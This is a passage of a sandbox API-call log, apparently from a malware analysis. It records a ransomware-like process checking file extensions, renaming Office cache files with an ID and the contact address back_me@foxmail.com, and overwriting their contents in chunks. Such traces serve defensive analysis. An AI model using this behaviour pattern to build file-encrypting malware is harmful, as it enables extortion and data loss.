lpString2=".exe") returned -1 [0035.484] lstrlenW (lpString=".docx") returned 5 [0035.484] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0035.484] lstrlenW (lpString=".pdf") returned 4 [0035.484] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0035.484] lstrlenW (lpString=".xls") returned 4 [0035.484] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0035.484] lstrlenW (lpString=".xlsx") returned 5 [0035.484] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0035.484] lstrlenW (lpString=".ppt") returned 4 [0035.484] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0035.484] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.484] lstrlenW (lpString=".zip") returned 4 [0035.484] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0035.484] lstrlenW (lpString=".rar") returned 4 [0035.484] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0035.484] lstrlenW (lpString=".bz2") returned 4 [0035.484] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0035.484] lstrlenW (lpString=".7z") returned 3 [0035.484] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0035.487] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0035.487] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.487] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.487] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.487] ReadFile (in: hFile=0x1a8, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.512] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.512] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.518] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.518] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.518] ReadFile (in: hFile=0x1a8, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.771] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.772] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0035.786] SetEndOfFile (hFile=0x1a8) returned 1 [0035.786] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bd930 [0035.791] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.791] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bd930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bd930*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.792] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.792] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bd930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bd930*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.792] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.792] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bd930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bd930*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.794] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bd930 | out: hHeap=0xb10000) returned 1 [0035.794] CloseHandle (hObject=0x1a8) returned 1 [0039.201] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0039.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.201] lstrlenW (lpString=".doc") returned 4 [0039.201] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.201] lstrlenW (lpString=".docx") returned 5 [0039.201] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.201] lstrlenW (lpString=".pdf") returned 4 [0039.201] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.201] lstrlenW (lpString=".xls") returned 4 [0039.201] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.201] lstrlenW (lpString=".xlsx") returned 5 [0039.201] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.201] lstrlenW (lpString=".ppt") returned 4 [0039.201] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.201] lstrlenW (lpString=".zip") returned 4 [0039.201] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.201] lstrlenW (lpString=".rar") returned 4 [0039.201] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.201] lstrlenW (lpString=".bz2") returned 4 [0039.201] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.201] lstrlenW (lpString=".7z") returned 3 [0039.202] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.202] lstrlenW (lpString=".dbf") returned 4 [0039.202] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.202] lstrlenW (lpString=".1cd") returned 4 [0039.202] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.202] lstrlenW (lpString=".jpg") returned 4 [0039.202] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.202] lstrlenW (lpString=".doc") returned 4 [0039.202] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString=".docx") returned 5 [0039.202] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.202] lstrlenW (lpString=".pdf") returned 4 [0039.202] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString=".xls") returned 4 [0039.202] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString=".xlsx") returned 5 [0039.202] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.202] lstrlenW (lpString=".ppt") returned 4 [0039.202] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.202] lstrlenW (lpString=".zip") returned 4 [0039.202] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString=".rar") returned 4 [0039.202] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.202] lstrlenW (lpString=".bz2") returned 4 [0039.202] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.203] lstrlenW (lpString=".7z") returned 3 [0039.203] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.203] lstrlenW (lpString=".dbf") returned 4 [0039.203] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.203] lstrlenW (lpString=".1cd") returned 4 [0039.203] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0039.203] lstrlenW (lpString=".jpg") returned 4 [0039.203] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.203] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0039.203] lstrlenW (lpString="OutlookMUI.msi") returned 14 [0039.203] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.203] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=2865664) returned 1 [0039.203] CloseHandle (hObject=0x1a8) returned 1 [0039.203] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 0x2020 [0039.204] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.204] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0039.204] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.204] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0039.204] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.204] ReadFile (in: hFile=0x1a8, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.215] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.215] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.224] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.224] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.224] ReadFile (in: hFile=0x1a8, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.239] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.240] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0039.458] SetEndOfFile (hFile=0x1a8) returned 1 [0039.458] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0039.521] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.521] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.675] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.675] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.680] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.680] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.682] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0039.685] CloseHandle (hObject=0x1a8) returned 1 [0039.762] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0039.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.762] lstrlenW (lpString=".doc") returned 4 [0039.762] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.762] lstrlenW (lpString=".docx") returned 5 [0039.762] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0039.762] lstrlenW (lpString=".pdf") returned 4 [0039.762] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.762] lstrlenW (lpString=".xls") returned 4 [0039.762] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.762] lstrlenW (lpString=".xlsx") returned 5 [0039.762] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0039.762] lstrlenW (lpString=".ppt") returned 4 [0039.763] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.763] lstrlenW (lpString=".zip") returned 4 [0039.763] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.763] lstrlenW (lpString=".rar") returned 4 [0039.763] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.763] lstrlenW (lpString=".bz2") returned 4 [0039.763] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.763] lstrlenW (lpString=".7z") returned 3 [0039.763] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.763] lstrlenW (lpString=".dbf") returned 4 [0039.763] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.763] lstrlenW (lpString=".1cd") returned 4 [0039.763] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.763] lstrlenW (lpString=".jpg") returned 4 [0039.763] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.763] lstrlenW (lpString=".doc") returned 4 [0039.763] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.763] lstrlenW (lpString=".docx") returned 5 [0039.763] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0039.763] lstrlenW (lpString=".pdf") returned 4 [0039.763] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.763] lstrlenW (lpString=".xls") returned 4 [0039.763] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.763] lstrlenW (lpString=".xlsx") returned 5 [0039.763] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0039.763] lstrlenW (lpString=".ppt") returned 4 [0039.764] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.764] lstrlenW (lpString=".zip") returned 4 [0039.764] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.764] lstrlenW (lpString=".rar") returned 4 [0039.764] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.764] lstrlenW (lpString=".bz2") returned 4 [0039.764] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.764] lstrlenW (lpString=".7z") returned 3 [0039.764] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.764] lstrlenW (lpString=".dbf") returned 4 [0039.764] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.764] lstrlenW (lpString=".1cd") returned 4 [0039.764] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.764] lstrlenW (lpString=".jpg") returned 4 [0039.764] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.764] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0039.764] lstrlenW (lpString="WordMUI.msi") returned 11 [0039.764] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.765] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=2522624) returned 1 [0039.765] CloseHandle (hObject=0x1a8) returned 1 [0039.765] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 0x2020 [0039.765] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.765] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0039.765] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.766] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0039.766] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.766] ReadFile (in: hFile=0x1a8, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.117] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.117] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.213] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0040.214] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.214] ReadFile (in: hFile=0x1a8, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.272] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.272] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0040.656] SetEndOfFile (hFile=0x1a8) returned 1 [0040.656] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0040.656] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.656] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.657] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: 